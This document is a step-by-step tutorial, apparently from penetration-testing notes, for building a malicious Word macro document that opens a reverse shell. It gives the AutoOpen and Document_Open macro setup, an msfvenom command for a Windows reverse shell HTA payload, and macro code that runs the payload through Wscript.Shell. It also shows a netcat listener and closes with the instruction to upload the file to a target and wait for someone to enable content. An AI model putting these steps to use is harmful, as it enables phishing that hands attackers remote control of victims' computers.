

  • Install Office.

  • Create a Word document, called Evil.doc.

  • Open a Macros from View menu. Select 'Evil' document in Macros in:

  • Insert your macro name, 'MyMacro' in the Macro name: and then click 'Create'

  • This will take you to a VB editor.

  • Add the following script to your new macro.

    Sub AutoOpen() 
    End Sub 
    Sub Document_Open() 
    End Sub
  • Create a reverse shell payload with hta extension via msfvenom

# Kali
sudo msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1234 -f hta-psh -o evil.hta
  • Make them readable with a python script. Download

# Kali
python evil.hta
  • Copy the split string to the Macro and add some commands in the Macro.

# Office Macro Editor
Dim Str As String

<Your string here>

CreateObject("Wscript.Shell").Run Str

End Sub
  • and save it as Word 97 format.

  • When you check the macro again, you see the following scripts.

  • Set up a netcat listener to validate your macro to work.

# Kali
nc -nlvp 1234
  • Open the word document.

  • Click Enable Content.

  • Kali machine, you will see the connection.


  • Check your macro

# Kali
sudo pip install -U oletools
olevba evil.doc

# Check if your macro exists
  • Set up a netcat listener again, upload the document to your target location, and wait until someone opens the document and enable content.

Last updated